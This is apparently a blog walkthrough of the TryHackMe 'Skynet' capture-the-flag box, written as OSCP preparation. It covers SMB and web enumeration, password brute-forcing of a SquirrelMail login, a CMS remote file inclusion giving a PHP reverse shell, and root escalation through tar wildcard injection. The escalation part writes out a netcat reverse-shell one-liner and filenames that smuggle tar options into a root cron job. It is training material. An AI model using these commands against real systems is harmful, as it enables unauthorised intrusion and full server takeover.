OSCP Prep – THM – Skynet

Since HackTheBox had problems yesterday I did OSCP like box from TryHackMe instead. This is a Linux box with a pretty straightforward approach. In the initial search there were a couple ports open, such as SMB, HTTP, POP3 and imap. Enumerting each of these ports will give you initial access, and root eventually.


I start with an NMAP scan. From the NMAP scan I see that SMB, IMAP, POP3, HTTP are some interesting open ports. So we will enumerate them in a bit.

root@ip-10-10-253-253:~/ctf# nmap -sC -sV -oN nmap.result

Starting Nmap 7.60 ( https://nmap.org ) at 2022-01-11 11:21 GMT
Nmap scan report for ip-10-10-73-85.eu-west-1.compute.internal (
Host is up (0.00060s latency).
Not shown: 994 closed ports
22/tcp  open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_  256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (EdDSA)
80/tcp  open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        Dovecot pop3d
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        Dovecot imapd
|_imap-capabilities: listed ID more OK SASL-IR LITERAL+ have IDLE IMAP4rev1 post-login Pre-login capabilities LOGINDISABLEDA0001 LOGIN-REFERRALS ENABLE
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 02:55:B6:AE:BF:BF (Unknown)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: skynet
|   NetBIOS computer name: SKYNET\x00
|   Domain name: \x00
|   FQDN: skynet
|_  System time: 2022-01-11T05:21:32-06:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2022-01-11 11:21:32
|_  start_date: 1600-12-31 23:58:45

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.33 seconds

I like to start enumerating SMB first to see if I find anything interesting.

Enumerating SMB

Taking a look at what shares are available we find some interesting. Since anonymous access is allowede we can list the shares and possible access some of them.

root@ip-10-10-253-253:~/ctf# smbclient -L // 
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	anonymous       Disk      Skynet Anonymous Share
	milesdyson      Disk      Miles Dyson Personal Share
	IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------

The two interersting shares here is anonymous and milesdyson. In the anonymous share we find a note that says that there have been a system malfunction and all skynet employees must change their password.

root@ip-10-10-253-253:~/ctf# cat attention.txt 
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson

Digging furthere in the share, there is a directory called logs. In the directory there are some log files, all of them are empty except one. This looks like a list of passwords, which we will save for later.

root@ip-10-10-253-253:~/ctf# cat log1.txt 

The other share, milesdyson, we have no access to it. One of the question in the task is what is miles dysons password.

Enumerating HTTP

Look at the webserver we are presented with skynets searchengine. I didn’t find anything interesting here, so I started up gobuster and did a subdirectory bruteforce using the common.txt wordlist.

root@ip-10-10-253-253:~/ctf# gobuster dir -u -w /usr/share/wordlists/dirb/common.txt 
2022/01/11 11:41:40 Starting gobuster
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/config (Status: 301)
/css (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
/squirrelmail (Status: 301)
2022/01/11 11:41:40 Finished

One that stands out here is squirrelamil. The other subdirectories we had no access to.

From earlier enumeration we have a username for Miles Dyson, which is milesdyson and we have a list of passwords from logs1.txt we could try out.

So spinning up BurpSuit we could intercept login request, send it to intruder and try and bruteforce our way in. In the picture below I’ve added the position where intruder will insert our passwordlist.

Right off the bat we can see that cyborg007haloterminator have another length than the other passwords, and HTTP status code of 302 (redirect), giving us a hint that this might be the correct password.

Squirrel Mail

Logging into Miles Dysons inbox we find his SMB password and we can try and see what we can find in his personal SMB share, milesdyson.

Inside his share we find alot of files, but one of them is named important.txt.

root@ip-10-10-253-253:~/ctf# cat important.txt 

1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

Hidden Directory

There is an hidden directory on the webserver named /45kra24zxs28v3yd.

Running gobuster against this hidden directory we find another subdirectory named Administrator.

root@ip-10-10-253-253:~/ctf# gobuster dir -u -w /usr/share/wordlists/dirb/common.txt 
2022/01/11 11:58:11 Starting gobuster
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/administrator (Status: 301)
/index.html (Status: 200)
2022/01/11 11:58:12 Finished

A quick google search reveal that there is a Remote File Inclusion vulnerability in this CMS, making it possbile for us to get a reverse shell.

From Exploit-db:

An attacker might include local or remote PHP files or read non-PHP files with this vulnerability. User tainted data is used when creating the file name that will be included into the current file. PHP code in this file will be evaluated, non-PHP code will be embedded to the output. This vulnerability can lead to full server compromise.


and using gobuster to verify that there is an alerts sub directory.

root@ip-10-10-253-253:~/ctf# gobuster dir -u -w /usr/share/wordlists/dirb/common.txt -x php

2022/01/11 12:01:21 Starting gobuster
/.htaccess (Status: 403)
/.htaccess.php (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.hta (Status: 403)
/.hta.php (Status: 403)
/alerts (Status: 301)
/classes (Status: 301)
/components (Status: 301)
/index.php (Status: 200)
/index.php (Status: 200)
/js (Status: 301)
/media (Status: 301)
/templates (Status: 301)
2022/01/11 12:01:22 Finished

A quick PoC:

Initial access

Confirming that we have LFI, we could try RFI.

The steps are as follow:

  1. Edit the php reverse shell script and add our local ip and port.
  2. Start a simple http server
  3. Start a netcat listener.
  4. Visit
  5. And we have a connection on our listener.

And after stabilizing our shell, we can look for user.txt


In Miles Dysons home directory there is a directory caleld backups where there are two files backup.sh and backup.tgz. Both are owned by root.

www-data@skynet:/home/milesdyson/backups$ ls -l
total 4
-rwxr-xr-x 1 root root 74 Sep 17  2019 backup.sh
-rw-r--r-- 1 root root  0 Jan 11 06:29 backup.tgz
www-data@skynet:/home/milesdyson/backups$ cat backup.sh 
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *

and looking at Crontab we see that backup.sh is executed every minute.

www-data@skynet:/home/milesdyson/backups$ cat /etc/crontab 
*/1 *	* * *   root	/home/milesdyson/backups/backup.sh

Since tar is using wildcard we can abuse it with placing our shell in the direcotry its backing up since we have write permission to that directory. And from GTFObins.

www-data@skynet:/var/www/html$ echo "mkfifo /tmp/fmbw; nc 8888 0</tmp/fmbw | /bin/sh >/tmp/fmbw 2>&1; rm /tmp/fmbw" > shell.sh
www-data@skynet:/var/www/html$ echo "" > "--checkpoint-action=exec=sh shell.sh"
www-data@skynet:/var/www/html$ echo "" > --checkpoint=1

From tar man page:

–checkpoint-action=ACTIONExecute ACTION at every checkpoint. ACTION may be one of the following:
–checkpoint[=NUMBER]Use “checkpoints”: display a progress message every NUMBER records (default 10).

Starting our netcat listener and listening to port 8888, we wait for cron to run the script.

Similar Posts